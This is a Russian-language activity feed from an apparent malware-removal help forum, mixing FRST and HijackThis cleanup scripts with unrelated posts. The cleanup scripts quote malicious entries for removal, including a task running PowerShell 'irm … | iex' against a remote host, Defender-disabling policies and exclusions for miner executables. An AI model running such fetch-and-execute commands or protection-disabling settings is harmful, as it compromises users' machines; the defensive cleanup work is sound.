Активность

Сделайте полную проверку с помощью KVRT. Если будут обнаружения, папку C:\KVRT2020_Data\Reports упакуйте в архив и прикрепите к следующему сообщению. p.s. Вы напрасно выполняли скрипты, написанные для других пользователей. Скрипты в этом разделе пишутся индивидуально и, выполняя чужой, в лучшем случае ничего не произойдёт, а в худшем вы рискуете повредить систему.

Fixlog.txtВот файл

Экспорт политики KES пришлите под действием которой находится этот хост.

Исправьте по возможности: Расширенная поддержка закончилась Внимание! Скачать обновления ^Корпоративные версии обновляются установкой с DVD или Flash-носителя соответствующей редакции. На устройстве может отсутствовать возможность получать обновления, если его оборудование несовместимо, на нем нет актуальных драйверов или истек срок его поддержки, предоставляемой поставщиком вычислительной техники (OEM).^ Microsoft Office LTSC профессиональный плюс 2021 - ru-ru v.16.0.14332.20493 Внимание! Скачать обновления ^Инструкция по обновлению Microsoft Office.^ NVIDIA GeForce Experience 3.27.0.120 v.3.27.0.120 Внимание! Скачать обновления Данная программа больше не поддерживается разработчиком. Рекомендуется использовать Приложение NVIDIA. AnyDesk v.ad 9.0.7 Внимание! Скачать обновления Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления 7-Zip 23.01 (x64) v.23.01 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ Krita (x64) 5.2.3 (git 68d178c) v.5.2.3.100 Внимание! Скачать обновления Java 8 Update 401 (64-bit) v.8.0.4010.10 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u461-windows-x64.exe - Windows Offline (64-bit))^ Adobe Acrobat (64-bit) v.25.001.20693 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - Проверить обновления!^ Google Chrome v.141.0.7390.54 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - О браузере Google Chrome!^ Читайте Рекомендации после удаления вредоносного ПО

SecurityCheck.txt

Исправьте по возможности: Контроль учётных записей пользователя включен Запрос на повышение прав для администраторов отключен ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ Так ли страшен Контроль учётных записей Paint.NET v.5.1.7 Внимание! Скачать обновления ---------------------------- [ UnwantedApps ] ----------------------------- Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. На заметку - Рекомендации после удаления вредоносного ПО

Здравствуйте! Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены. Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ Task: {9CE57D0D-15D3-4459-9FAE-F10CD6294626} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-09-10] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ ProxyServer: [S-1-5-21-3259035200-1569438540-2830552035-1001] => hxxp://127.0.0.1:12334 RemoveProxy: CHR StartupUrls: Default -> "hxxp://mypoisk.su/" S3 PDFWKRNL; \??\C:\WINDOWS\SystemTemp\USBCPDFW\pdfwkrnl.sys [X] AlternateDataStreams: C:\WINDOWS\tracing:? [16] HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\regfile: <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.reg: => <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.bat: => <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.cmd: => <==== ВНИМАНИЕ FirewallRules: [{fceb0998-b671-4fdc-95b3-eb458e687d28}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{a1d0f5ea-3f97-4a01-a4af-e4353d001be9}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{ADB0A096-466F-40C0-A130-4BED1EBC728E}] => (Allow) C:\Users\Shieteu\AppData\Roaming\BitTorrent\BitTorrent.exe => Нет файла FirewallRules: [{BD201553-3891-4759-9E80-4A098C532495}] => (Allow) C:\Users\Shieteu\AppData\Roaming\BitTorrent\BitTorrent.exe => Нет файла EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве.

SecurityCheck.txt

Отлично! В завершение, пожалуйста: 1. Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратораЕсли увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txtЕсли Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txtПрикрепите этот файл к своему следующему сообщению.

Спасибо за помощь. MBAM успешно запустился.

Хорошо. Что сейчас с проблемой?

Также прикреплю отчеты от FRSTAddition and FRST.rar

Fixlog.txt

Столкнулся на днях с тем,то что в системе появился майнер с названием WinAIHService.exe, пытался самостоятельно удалить файлы, удалять его из автозагрузки и параметр на автозагрузку в реестре, все безуспешно, вот архив с логом от автологгера:CollectionLog-2025.10.03-11.35.zip

Можете с телефона, например, записать видео загрузки и выложить на какой-нибудь файлообменник?

Так что поможете?

По нашей части в завершение, пожалуйста: 1. Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратораЕсли увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txtЕсли Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txtПрикрепите этот файл к своему следующему сообщению.

Понял, спасибо огромное за помощь)

Поменял свой старенький Keenetic Start II на Xiaomi AC1200. Теперь у меня всё летает. А то я раньше на провайдера грешил.

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены. Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\laddjijkcfpakbbnnedbhnnciecidncp C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\laddjijkcfpakbbnnedbhnnciecidncp StartPowerShell: Remove-MpPreference -ExclusionPath "C:\Windows\SysWow64\unsecapp.exe" Remove-MpPreference -ExclusionPath "C:\Program Files\RDP Wrapper" Remove-MpPreference -ExclusionPath "C:\ProgramData\WindowsTask\AMD.exe" Remove-MpPreference -ExclusionPath "C:\ProgramData" Remove-MpPreference -ExclusionPath "C:\ProgramData\WindowsTask\audiodg.exe" Remove-MpPreference -ExclusionPath "C:\ProgramData\ReaItekHD\taskhostw.exe" Remove-MpPreference -ExclusionPath "C:\ProgramData\ReaItekHD\taskhost.exe" Remove-MpPreference -ExclusionPath "C:\ProgramData\WindowsTask\AppModule.exe" EndPowerShell: FirewallRules: [{803CE728-20C3-4FE6-83D8-D6FA5345C68C}] => (Block) LPort=445 FirewallRules: [{699E2EC0-6589-4D80-874D-D1FA19E3B1F7}] => (Block) LPort=445 FirewallRules: [{97B878E3-7973-4C12-BE6C-A09B8666DBCB}] => (Block) LPort=139 FirewallRules: [{1FBD7C69-C411-4678-AD98-1D9754A0C5D3}] => (Block) LPort=139 FirewallRules: [{98443CB4-4819-4BB2-B7B4-F5B342153396}] => (Allow) LPort=3389 FirewallRules: [{4FE1D18C-0E62-421F-AF03-E71469A9A1F6}] => (Allow) LPort=30305 FirewallRules: [{11135C1B-F10B-4AC9-8D98-8EE694D889D3}] => (Allow) LPort=30306 FirewallRules: [{EB4DF3B6-4D79-44BB-A80D-C9617D9F5DA0}] => (Allow) LPort=30301 ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве.

Addition.txt FRST.txt

Гран-при СИНГАПУРА | ЭТАП 18 П О Р Т А Л П Р О Г Н О З О В приём ставок на соревнование «Формулы-1» ¤ ¤ ¤ СТАВКИ ПРИНИМАЮТСЯ С 03 ОКТЯБРЯ ДО 1555 04 ОКТЯБРЯ (время московское)

Продолжаем. "Пофиксите" в HijackThis только следующее (некоторые строки могут отсутствовать): O4 - Autorun.inf: D:\autorun.inf - open - CDSetup.exe (file missing) O4 - Autorun.inf: E:\autorun.inf - (unknown target) O4 - MountPoints2: HKCU\..\{79692ef4-b953-11ee-abf0-806e6f6e6963}\shell\AutoRun\command: (default) = F:\setup.exe (file missing) O7 - Policy: (UAC) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: [ConsentPromptBehaviorAdmin] = 0 O7 - Policy: (UAC) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: [PromptOnSecureDesktop] = 0 O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Real-Time Protection: [DisableRealtimeMonitoring] = 1 O27 - RDP: (Other) HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server: [fDenyTSConnections] = 0 Перезагрузите компьютер. Соберите новые логи FRST.txt и Addition.txt

CollectionLog-2025.10.03-11.31.zip AV_block_remove_2025.10.03-11.21.log

Здравствуйте! Скачайте AV block remover (или с зеркала). Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя). Можно также воспользоваться версией со случайным именем. Если и так не сработает, запускайте программу из любой папки кроме папок Рабочий стол (Desktop) и Загрузки (Downloads). В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению. После перезагрузки системы соберите CollectionLog Автологером по Правилам оформления запроса о помощи